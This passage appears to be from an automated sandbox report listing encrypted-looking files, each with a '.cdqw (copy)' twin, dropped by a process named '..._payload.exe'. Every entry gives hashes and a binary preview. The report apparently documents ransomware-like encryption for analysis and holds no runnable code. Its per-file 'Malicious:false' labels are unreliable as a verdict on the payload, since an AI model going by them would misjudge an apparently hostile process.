                                                                                                                                                                      SSDEEP:24:qbhqAk+7giphpjGb4Ug2DiUgw84H5qHZ+WeMd9XNjoJI9CAV2bD:6gAk+MY1GWwtWZj9uJkSD
                                                                                                                                                                      MD5:924397B270C663315CE4FA2680A8B283
                                                                                                                                                                      SHA1:B6B70A300439243236D7288E03264ACFA695DB89
                                                                                                                                                                      SHA-256:6D7502681741BEDF5B368F9262DD574536FE27BF3A6043B24C1F7A8B407C1880
                                                                                                                                                                      SHA-512:98C76043C3C0E4DEC3A8D42AFAF2712739F68A178E5D97F74926E984584B086CCA09A4DDF136DCEC55CE6E368A3F1577E5D9BD30AA85BF2E094EF63B9154127E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN.e.o.......<.%.".K..u..d..."...~....Z%J.~. uG....r...>yD..J.....P.%.52....!..`.s6x..T.]b.....(...9(...O. ...us...^=(..<....A3ykx;..*K.ND............[.Hc..=.pr.6..\..Gns...s..].:..z..UC*..D@..v^..l9VQ.....q....cS..g.%.F.6..@.......g..R.....43.|8.........0/c.T...x.h....6..s.qh.J.?&....]%.._zTcGGOu..2.B.XzD`J.!<.3..`..c$x...A2..S....S....;...sH....B..6..C.W%4.......?....F.h..b/......j....Z.K..[...4{..L*;\#.LE.....(.tD`..H/.,W....O..X.V7..G:X|.^..............k.F..T..'...y....L....Y.g!06q.p..../BE...1D.;.mr(.].D..Nk.ai.%5S.......M].4A...5.%.%l.Q..E1.h..H.1U..].~..&.%.u%99....;671..{|.m..Y.UF..@..;...,....p....LN.[..b..C#d..x.............a..h..I...&..Y...C.X.2.....L?..HE....+.6. .e...4.o@=.#.....M5&...p.....z.i..;=....31O.C...>2.yo....um..../...^.`..0..qG.!.,.[.Q...cQ..45..DH....F.9.....q......Z...X...O.n.......&..sI.......t.IC...>7d"....w..0..*..=.Q..Ww..(......;?..B{_.L..*..e ..-T*s.........O.D...J...N...I.Y..yN3.S47..vn

                                                                                                                                                                      C:\Users\user\Desktop\UMMBDNEQBN\KZWFNRXYKI.pdf.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.833098891512211
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:qbhqAk+7giphpjGb4Ug2DiUgw84H5qHZ+WeMd9XNjoJI9CAV2bD:6gAk+MY1GWwtWZj9uJkSD
                                                                                                                                                                      MD5:924397B270C663315CE4FA2680A8B283
                                                                                                                                                                      SHA1:B6B70A300439243236D7288E03264ACFA695DB89
                                                                                                                                                                      SHA-256:6D7502681741BEDF5B368F9262DD574536FE27BF3A6043B24C1F7A8B407C1880
                                                                                                                                                                      SHA-512:98C76043C3C0E4DEC3A8D42AFAF2712739F68A178E5D97F74926E984584B086CCA09A4DDF136DCEC55CE6E368A3F1577E5D9BD30AA85BF2E094EF63B9154127E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN.e.o.......<.%.".K..u..d..."...~....Z%J.~. uG....r...>yD..J.....P.%.52....!..`.s6x..T.]b.....(...9(...O. ...us...^=(..<....A3ykx;..*K.ND............[.Hc..=.pr.6..\..Gns...s..].:..z..UC*..D@..v^..l9VQ.....q....cS..g.%.F.6..@.......g..R.....43.|8.........0/c.T...x.h....6..s.qh.J.?&....]%.._zTcGGOu..2.B.XzD`J.!<.3..`..c$x...A2..S....S....;...sH....B..6..C.W%4.......?....F.h..b/......j....Z.K..[...4{..L*;\#.LE.....(.tD`..H/.,W....O..X.V7..G:X|.^..............k.F..T..'...y....L....Y.g!06q.p..../BE...1D.;.mr(.].D..Nk.ai.%5S.......M].4A...5.%.%l.Q..E1.h..H.1U..].~..&.%.u%99....;671..{|.m..Y.UF..@..;...,....p....LN.[..b..C#d..x.............a..h..I...&..Y...C.X.2.....L?..HE....+.6. .e...4.o@=.#.....M5&...p.....z.i..;=....31O.C...>2.yo....um..../...^.`..0..qG.!.,.[.Q...cQ..45..DH....F.9.....q......Z...X...O.n.......&..sI.......t.IC...>7d"....w..0..*..=.Q..Ww..(......;?..B{_.L..*..e ..-T*s.........O.D...J...N...I.Y..yN3.S47..vn

                                                                                                                                                                      C:\Users\user\Desktop\UMMBDNEQBN\UMMBDNEQBN.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85621676730889
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3S8LhsZiWT+SEZWHJfdHu6/6ibU0ttLgb28DZAyNPfQ22bD:3S8LhsIWT+YJ1O6/6GU0tab289nnoD
                                                                                                                                                                      MD5:FC8B2735FC23E763E234DD3F9D8B6ED8
                                                                                                                                                                      SHA1:4F8F2C50EF1D78E1A4A3EA24E8B1CCA8B9786CD8
                                                                                                                                                                      SHA-256:1DBB9AED109B10589DD1ABC09DFAA7BCCD1113A20085A4B396B791DD1047752B
                                                                                                                                                                      SHA-512:A0A19195AE57FAD6AA71F1D44A1C0EF766A6375189E43AFA7DC221CD25F8DFD4E4E1536A53D13B1327A61CC755EAE07CB01BD0C0E3960E043258FECF04F053A8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD....t.4(1. ..4.Z..m.....G.............qC.$k.H,}l....j.a.i.k.;.=2.YS...'\.....)2."..~...'.M...x..S.?..6.......C.....h.W2..D.5....{.....?....yI..'..?s."~...,#Z:P......*...:t._=.%.r...-#...U...+*....OI..{......IyUk..[b~...@.:c3..n..6...8....\......._.E..|$......& .....hy@.P....(zt=.,.....'_~..XN.2H.O.XD0..<.d./.......}.S."..S*V..Lv17.x..f..I..ju.?.).P?t.{^.z?v.0..v`r.'....)....\....W1.7.6.f....7...p.G.....ap.:.&G.E.....*.J.9...9~..4....k......w... ....s.PCEHt.{.n...k..{....Q....'....7{I.)<IJ3GY.>[....D.:...e..|n. .\ws.q...a.|.........><.sQ.=.|......P....}..a..?.- o...W>.X+H_..&sp.....G.bo.....\m9R!?..Q`T.;...f..+i.cT.CH..#GaKI..2$C.......nEA....m..n..]....7V.|..4.U*"..Cj...S.O....S...?...}.........{......_z.t.....Z.%..~qR......3.d.y>..p..O....p.W..:....j.Qq..i R...M......N.Y..].%U.o.f..?.X.*....69...F%c...........pZ0.Ij...!....\.u.+.,P..@,....~w>..)dL1j!X7...q..;.m....}......a=n.\..#..k..4A....D.$$.W....j.w(....u..3....."p..0..

                                                                                                                                                                      C:\Users\user\Desktop\UMMBDNEQBN\UMMBDNEQBN.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.85621676730889
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3S8LhsZiWT+SEZWHJfdHu6/6ibU0ttLgb28DZAyNPfQ22bD:3S8LhsIWT+YJ1O6/6GU0tab289nnoD
                                                                                                                                                                      MD5:FC8B2735FC23E763E234DD3F9D8B6ED8
                                                                                                                                                                      SHA1:4F8F2C50EF1D78E1A4A3EA24E8B1CCA8B9786CD8
                                                                                                                                                                      SHA-256:1DBB9AED109B10589DD1ABC09DFAA7BCCD1113A20085A4B396B791DD1047752B
                                                                                                                                                                      SHA-512:A0A19195AE57FAD6AA71F1D44A1C0EF766A6375189E43AFA7DC221CD25F8DFD4E4E1536A53D13B1327A61CC755EAE07CB01BD0C0E3960E043258FECF04F053A8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:UMMBD....t.4(1. ..4.Z..m.....G.............qC.$k.H,}l....j.a.i.k.;.=2.YS...'\.....)2."..~...'.M...x..S.?..6.......C.....h.W2..D.5....{.....?....yI..'..?s."~...,#Z:P......*...:t._=.%.r...-#...U...+*....OI..{......IyUk..[b~...@.:c3..n..6...8....\......._.E..|$......& .....hy@.P....(zt=.,.....'_~..XN.2H.O.XD0..<.d./.......}.S."..S*V..Lv17.x..f..I..ju.?.).P?t.{^.z?v.0..v`r.'....)....\....W1.7.6.f....7...p.G.....ap.:.&G.E.....*.J.9...9~..4....k......w... ....s.PCEHt.{.n...k..{....Q....'....7{I.)<IJ3GY.>[....D.:...e..|n. .\ws.q...a.|.........><.sQ.=.|......P....}..a..?.- o...W>.X+H_..&sp.....G.bo.....\m9R!?..Q`T.;...f..+i.cT.CH..#GaKI..2$C.......nEA....m..n..]....7V.|..4.U*"..Cj...S.O....S...?...}.........{......_z.t.....Z.%..~qR......3.d.y>..p..O....p.W..:....j.Qq..i R...M......N.Y..].%U.o.f..?.X.*....69...F%c...........pZ0.Ij...!....\.u.+.,P..@,....~w>..)dL1j!X7...q..;.m....}......a=n.\..#..k..4A....D.$$.W....j.w(....u..3....."p..0..

                                                                                                                                                                      C:\Users\user\Desktop\UMMBDNEQBN\WKXEWIOTXI.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.84945942697276
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:fJRQzlqvW07Idm5nx6vTdFjjYIk4tyf0e5Ql1Rh009MMd7VtAAV+2bD:f06WVdwnQL3YEJe6lDysBfiATD
                                                                                                                                                                      MD5:9D7F786E374616E925349AA35D5A2F6C
                                                                                                                                                                      SHA1:2A504B6DCF7934AAD8CD778F9B66EE2732B8953B
                                                                                                                                                                      SHA-256:D569DC6A37CCD54F04861187F0D574D116D38868926DE92098C3321CED08171D
                                                                                                                                                                      SHA-512:C6200C6F25240714C79D6F42081D77A57A6F3F845B5B25C10447F4C41DEC1741AECE50A645F27954D744403E4F660C52EF2ED8A3B9060D0446BD76D660D74DD2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WKXEW4..{..t`....Q.....*...)[:1...v. Z...6....+f..%R....{%...j...-..G>z...S.2.+PZ:.lx....K.g.r.N..=.g].k.\olm+i...cK.....S......W.p...~C.s.!........D..{...TC>.g.@.Aa..[K*.}:,.....Qu..0).a...........h....A.%..S...tzR.)m.j..7...s.N..`o%..o._-+..!...A.-..,.M.......^V.3....mmo...../Gg....h..9....#..x....{....;$..(0.7w....n,.....+.Q..f...c..9c...*.X6.....P....<....o...5l.k...i.W7.n.....r&.....P...B.....6.|A+x.'..x..W..W.>u..!..W.....VpGPp.q....c.Td5_.?*#..6p%.....~...;.1..-.....<.P4.B....f^.v[..@.C!.'.].9...q...r....5l.1#f...9..:|.m..Z.D....^.(......Bb.h4..2..L.~\sv.V.ml.r-c...q...C.\. ...].n.Ha...UW.3.Sp|...f.C..........1...R.).RqB...S.....7.K...m..9.<l.....a.(......I..wH..!?q.f...tX.....o.Tp+..E.y..=....9..w+).....z.C0...c..|....6Rc.L..,.;.r.m]2'....6._W..4.$d#y...#+..8_...%nu.$d=.\..SM.......*...[A..?.F...0.L......C.5...._..vz.t.q{Z..O.....AG.I......E.3.#..t7.t.4.).,W.L..#......%.M.....?Z...+........_.vv...[....q....f......iu.O....l....

                                                                                                                                                                      C:\Users\user\Desktop\UMMBDNEQBN\WKXEWIOTXI.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.84945942697276
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:fJRQzlqvW07Idm5nx6vTdFjjYIk4tyf0e5Ql1Rh009MMd7VtAAV+2bD:f06WVdwnQL3YEJe6lDysBfiATD
                                                                                                                                                                      MD5:9D7F786E374616E925349AA35D5A2F6C
                                                                                                                                                                      SHA1:2A504B6DCF7934AAD8CD778F9B66EE2732B8953B
                                                                                                                                                                      SHA-256:D569DC6A37CCD54F04861187F0D574D116D38868926DE92098C3321CED08171D
                                                                                                                                                                      SHA-512:C6200C6F25240714C79D6F42081D77A57A6F3F845B5B25C10447F4C41DEC1741AECE50A645F27954D744403E4F660C52EF2ED8A3B9060D0446BD76D660D74DD2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:WKXEW4..{..t`....Q.....*...)[:1...v. Z...6....+f..%R....{%...j...-..G>z...S.2.+PZ:.lx....K.g.r.N..=.g].k.\olm+i...cK.....S......W.p...~C.s.!........D..{...TC>.g.@.Aa..[K*.}:,.....Qu..0).a...........h....A.%..S...tzR.)m.j..7...s.N..`o%..o._-+..!...A.-..,.M.......^V.3....mmo...../Gg....h..9....#..x....{....;$..(0.7w....n,.....+.Q..f...c..9c...*.X6.....P....<....o...5l.k...i.W7.n.....r&.....P...B.....6.|A+x.'..x..W..W.>u..!..W.....VpGPp.q....c.Td5_.?*#..6p%.....~...;.1..-.....<.P4.B....f^.v[..@.C!.'.].9...q...r....5l.1#f...9..:|.m..Z.D....^.(......Bb.h4..2..L.~\sv.V.ml.r-c...q...C.\. ...].n.Ha...UW.3.Sp|...f.C..........1...R.).RqB...S.....7.K...m..9.<l.....a.(......I..wH..!?q.f...tX.....o.Tp+..E.y..=....9..w+).....z.C0...c..|....6Rc.L..,.;.r.m]2'....6._W..4.$d#y...#+..8_...%nu.$d=.\..SM.......*...[A..?.F...0.L......C.5...._..vz.t.q{Z..O.....AG.I......E.3.#..t7.t.4.).,W.L..#......%.M.....?Z...+........_.vv...[....q....f......iu.O....l....

                                                                                                                                                                      C:\Users\user\Desktop\VLZDGUKUTZ.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.856731754528711
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:V5mIhPh40sDT+nF1tOFTG9KIVbSf5FqDT7pCCWZFRAguo8EaoesbeVb6yI6XB2bD:VphRmCnFyFK9KIYR0D3UPjmroRdeHlNi
                                                                                                                                                                      MD5:8CB12E4D947959B959F3D519827CCF46
                                                                                                                                                                      SHA1:C60BC669C662FCB19F9685EB4260E82F552C45CD
                                                                                                                                                                      SHA-256:B0A917C48FF1BC6174F27E79213D560B934AB1985FE11A0493BDF380EA7C938E
                                                                                                                                                                      SHA-512:B9046EE364C97E09B16D790CFD7E51173685512D30996B3BE472268DD684CE90B3598A510D146FAEDFCC3D16DB56C2B18E9B28D2E7D28CE4F060D2A9A5388D9B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDGu2&0.....|.49.Gz..7..&..H.7...\.=.Mi..<%HR..~..y....-ks.....bdl0..*<N\...,.y.Z\..}..>...O....Es.,......C.9.U...+f.B.......v.....%.pq.$...Ly..Q.......R.8.....2..D.^7W.....Ys..........8G.9.i..#.P..?.||DJ..h.....*....v9.e..^.?.`.fL...U.....~d..(d~..\`.i.....oz..w.e.s."......<..-tZ..F.....)...h...._@U.9j..@.....j..P.......!...7.{av9(..W.V...jz...\....?.W...f?....q.h4.Ge..$%..{.z..#..].D.....ss..8),"c[.k...N..L..|.d..lV...*.nZ..*G%....J83V..\...~..-..`....`?.6#..v.V.]..K.,...e....8.oO..p&nnk......]AY...G=..TEf...b.J..a...,......].}}.<..8......~.......S\.h.F..dpW2<{.-.L+.\o...)..T....cS;K.H.#.%qTX........nvo.....6.kg.........r.I4OS...B.._=.....\...@[.JQ......<.rn..)0.6....$|r..R%....X.j... .}..!.}.,...'9...~...G.......... ...f.X^9.....t.4X.....q.r|d..A...wi.u2.......O.o#n.o.P..{bz..z ^..U7...@-.n"c..Q..Z.^.C...+_BI]K..Z...\.j..+."oj.dA+.0D....G`...yn..nfZ....o .k.......:.3...e.....(.4-wi...(...p....s...[..;.ys..x.>.v.....!{1......o....q....

                                                                                                                                                                      C:\Users\user\Desktop\VLZDGUKUTZ.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.856731754528711
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:V5mIhPh40sDT+nF1tOFTG9KIVbSf5FqDT7pCCWZFRAguo8EaoesbeVb6yI6XB2bD:VphRmCnFyFK9KIYR0D3UPjmroRdeHlNi
                                                                                                                                                                      MD5:8CB12E4D947959B959F3D519827CCF46
                                                                                                                                                                      SHA1:C60BC669C662FCB19F9685EB4260E82F552C45CD
                                                                                                                                                                      SHA-256:B0A917C48FF1BC6174F27E79213D560B934AB1985FE11A0493BDF380EA7C938E
                                                                                                                                                                      SHA-512:B9046EE364C97E09B16D790CFD7E51173685512D30996B3BE472268DD684CE90B3598A510D146FAEDFCC3D16DB56C2B18E9B28D2E7D28CE4F060D2A9A5388D9B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:VLZDGu2&0.....|.49.Gz..7..&..H.7...\.=.Mi..<%HR..~..y....-ks.....bdl0..*<N\...,.y.Z\..}..>...O....Es.,......C.9.U...+f.B.......v.....%.pq.$...Ly..Q.......R.8.....2..D.^7W.....Ys..........8G.9.i..#.P..?.||DJ..h.....*....v9.e..^.?.`.fL...U.....~d..(d~..\`.i.....oz..w.e.s."......<..-tZ..F.....)...h...._@U.9j..@.....j..P.......!...7.{av9(..W.V...jz...\....?.W...f?....q.h4.Ge..$%..{.z..#..].D.....ss..8),"c[.k...N..L..|.d..lV...*.nZ..*G%....J83V..\...~..-..`....`?.6#..v.V.]..K.,...e....8.oO..p&nnk......]AY...G=..TEf...b.J..a...,......].}}.<..8......~.......S\.h.F..dpW2<{.-.L+.\o...)..T....cS;K.H.#.%qTX........nvo.....6.kg.........r.I4OS...B.._=.....\...@[.JQ......<.rn..)0.6....$|r..R%....X.j... .}..!.}.,...'9...~...G.......... ...f.X^9.....t.4X.....q.r|d..A...wi.u2.......O.o#n.o.P..{bz..z ^..U7...@-.n"c..Q..Z.^.C...+_BI]K..Z...\.j..+."oj.dA+.0D....G`...yn..nfZ....o .k.......:.3...e.....(.4-wi...(...p....s...[..;.ys..x.>.v.....!{1......o....q....

                                                                                                                                                                      C:\Users\user\Desktop\VLZDGUKUTZ\HTAGVDFUIE.xlsx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.852780612264318
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:VZ08Ett8Q88S8Vgo9OVZtl4VdiwrsYl1PBae87jcJpsAm0V2bD:VG8Etb8L8t9CblMTrse1PBaVcKVD
                                                                                                                                                                      MD5:F5D8DC47F7C302B02A69D9A05BC696ED
                                                                                                                                                                      SHA1:9E97441711DDF5C05490811E922E856B7D2F938A
                                                                                                                                                                      SHA-256:60B0AA9498B11969EEF705F6E9355C749F9CD81E767590C90E3EF7735DBAD745
                                                                                                                                                                      SHA-512:C67F429154A309A3C83D46EAE8E90EED58F37AD80AC56642CBEDF916BF4D2394EC6B5EBE69843FF61178830D5DC1F5B5A7AF64839E214D6381D3D239CE1FBD0F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV\8s...:.<..Fqs.^k...(.S.}...v...j..\...M.p...0G"a...XK.9.u..d\....H9e.......$....."..H.K...MH.D......q.e..G....;q..E.z..;.....T]Ao...@S..Ok}M...)g..A@..C..N9.5.B...._i;.Uss...."=.Yr..}..@....Ri.G<..X.#...\....uv. ,.S.Z..V....j;<01U...Bem5..&.,.l...-#........6...l.<e.hA...*....$...W(.w.u.L.2..li...R..=b%V`a.+.K..5...:._c.Eu.o...QY..r..G....y.b....'%M.....E...2..yA......d..-...........ln].x[Y.z...|...Mz..VBCw.]'...v..\.{=.;.K..ow?9L;.....*...b.O....B.NC.s..b.I...bS.a...D2....W.....6.;.{..:..$..j.c.F.E..#.S....0....{CJ?0.E...Nz..?W.<.C--U...$l..Re....C..n...9.Vk....J.JJ.7.S.$...f^./9..y...`...!...F.b.^..^...jN.d.. ...Y/.....hxQ.Zq......B.,2.....x.~.H..y..z......#C>.w..I..|...k.......k/.]{#..!..P.....?.C.Y.+.&.#d.7....!.W.8....0..._]?(e..7...b.i..Y..W...N!...g..p.......z$..j?..Z5S..v.)u.Xh..D..Y.$... )P..9.....].C...JG......G_x}..S.......^).#.Uw#."3.c.p..j3$....L..2u..Y/...?....H...DU..6.k....c./y...<J~|............. D....

                                                                                                                                                                      C:\Users\user\Desktop\VLZDGUKUTZ\HTAGVDFUIE.xlsx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.852780612264318
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:VZ08Ett8Q88S8Vgo9OVZtl4VdiwrsYl1PBae87jcJpsAm0V2bD:VG8Etb8L8t9CblMTrse1PBaVcKVD
                                                                                                                                                                      MD5:F5D8DC47F7C302B02A69D9A05BC696ED
                                                                                                                                                                      SHA1:9E97441711DDF5C05490811E922E856B7D2F938A
                                                                                                                                                                      SHA-256:60B0AA9498B11969EEF705F6E9355C749F9CD81E767590C90E3EF7735DBAD745
                                                                                                                                                                      SHA-512:C67F429154A309A3C83D46EAE8E90EED58F37AD80AC56642CBEDF916BF4D2394EC6B5EBE69843FF61178830D5DC1F5B5A7AF64839E214D6381D3D239CE1FBD0F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV\8s...:.<..Fqs.^k...(.S.}...v...j..\...M.p...0G"a...XK.9.u..d\....H9e.......$....."..H.K...MH.D......q.e..G....;q..E.z..;.....T]Ao...@S..Ok}M...)g..A@..C..N9.5.B...._i;.Uss...."=.Yr..}..@....Ri.G<..X.#...\....uv. ,.S.Z..V....j;<01U...Bem5..&.,.l...-#........6...l.<e.hA...*....$...W(.w.u.L.2..li...R..=b%V`a.+.K..5...:._c.Eu.o...QY..r..G....y.b....'%M.....E...2..yA......d..-...........ln].x[Y.z...|...Mz..VBCw.]'...v..\.{=.;.K..ow?9L;.....*...b.O....B.NC.s..b.I...bS.a...D2....W.....6.;.{..:..$..j.c.F.E..#.S....0....{CJ?0.E...Nz..?W.<.C--U...$l..Re....C..n...9.Vk....J.JJ.7.S.$...f^./9..y...`...!...F.b.^..^...jN.d.. ...Y/.....hxQ.Zq......B.,2.....x.~.H..y..z......#C>.w..I..|...k.......k/.]{#..!..P.....?.C.Y.+.&.#d.7....!.W.8....0..._]?(e..7...b.i..Y..W...N!...g..p.......z$..j?..Z5S..v.)u.Xh..D..Y.$... )P..9.....].C...JG......G_x}..S.......^).#.Uw#."3.c.p..j3$....L..2u..Y/...?....H...DU..6.k....c./y...<J~|............. D....

                                                                                                                                                                      C:\Users\user\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.867157877364767
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:BCjJN/OIk1Uvu5IDDZW4uZOGlJpksPWbBILHD2wCTD0ftWJuCWjl0V2bD:BC1NWl1iM489W8WmjYDtYDjbD
                                                                                                                                                                      MD5:8FAE0E84895681C260FD412A6E232B36
                                                                                                                                                                      SHA1:E67CD5AD77700902C5EF34C66C978EEFE44D383C
                                                                                                                                                                      SHA-256:8F18CA39703F4AB701DC77785ECC4D2CC5ED72472FC8A8A0CDC8C75E9A1D0FA0
                                                                                                                                                                      SHA-512:5FDE0302F83BC16A6CB4592A15ECD65A6A2FE1BCF49FC20D363AD16846DD401D89F66B0C1FAFD3D39684C0B549A133117C9FA5B6D840F762584DAFE1FFBA5164
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NIKHQq...mqO+..5...i...#>..N..$..l..z.s.!...m}.Zt..~.q.F...X.o3G>....m...\ex........\a.r..|..pM......m).,Ld.^.N%.6WF..Phf.J.cUY...lN..].k...v.Tv.w.L_.....\.b.........lS7\P.....Au--Fn+.M.B....z&^.;..n.dy.)@&.(..Z......M.v......Z......n>.r}..~....w.s.P...m.r[?....._.j..*G...xh.M$...;|{k..FD.1_5..#.t..Y.r1.3Tw^...A...5uIIU..RY:.Z...]..x.y% .Hy\.......3W....[B.._+.d.[.R.A&gt g.../..........a.f../...%^..%.K.p.y18..u......\.>.%.:<.&A..{.T.u..Q.<f...7.f.....g.....N......W?.0..i...C8...W.bp.D.8:....l..y...}.1<....W6..(..u2.s.Z..g^...5..X.L./.K.u.."Y..X...8..A7).......lT.i.8._s.O..|.(3...E...."..oe..'@1OM.mVH...\.G....4..}.&.W`....r1K.U.=..K..%..il.N.....W..g.yl..w6.f.^>...F.)...F.|....f(bl..["......jc.6.........s.. .!..Wx..k?{...G.q..U2..7......X..C.+....Bm...S!).!S.8,....j...).........7.D...Ht+..7..........e.L.Gp..<_.l.d"K...Q....-.Qp0..L.QDE..2.4...sN..Wx....-(.A(;;...#0K...........'.9.'........n.;....DI.k........|.R.?...~... f.2...g....

                                                                                                                                                                      C:\Users\user\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.867157877364767
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:BCjJN/OIk1Uvu5IDDZW4uZOGlJpksPWbBILHD2wCTD0ftWJuCWjl0V2bD:BC1NWl1iM489W8WmjYDtYDjbD
                                                                                                                                                                      MD5:8FAE0E84895681C260FD412A6E232B36
                                                                                                                                                                      SHA1:E67CD5AD77700902C5EF34C66C978EEFE44D383C
                                                                                                                                                                      SHA-256:8F18CA39703F4AB701DC77785ECC4D2CC5ED72472FC8A8A0CDC8C75E9A1D0FA0
                                                                                                                                                                      SHA-512:5FDE0302F83BC16A6CB4592A15ECD65A6A2FE1BCF49FC20D363AD16846DD401D89F66B0C1FAFD3D39684C0B549A133117C9FA5B6D840F762584DAFE1FFBA5164
                                                                                                                                                                      Malicious:false
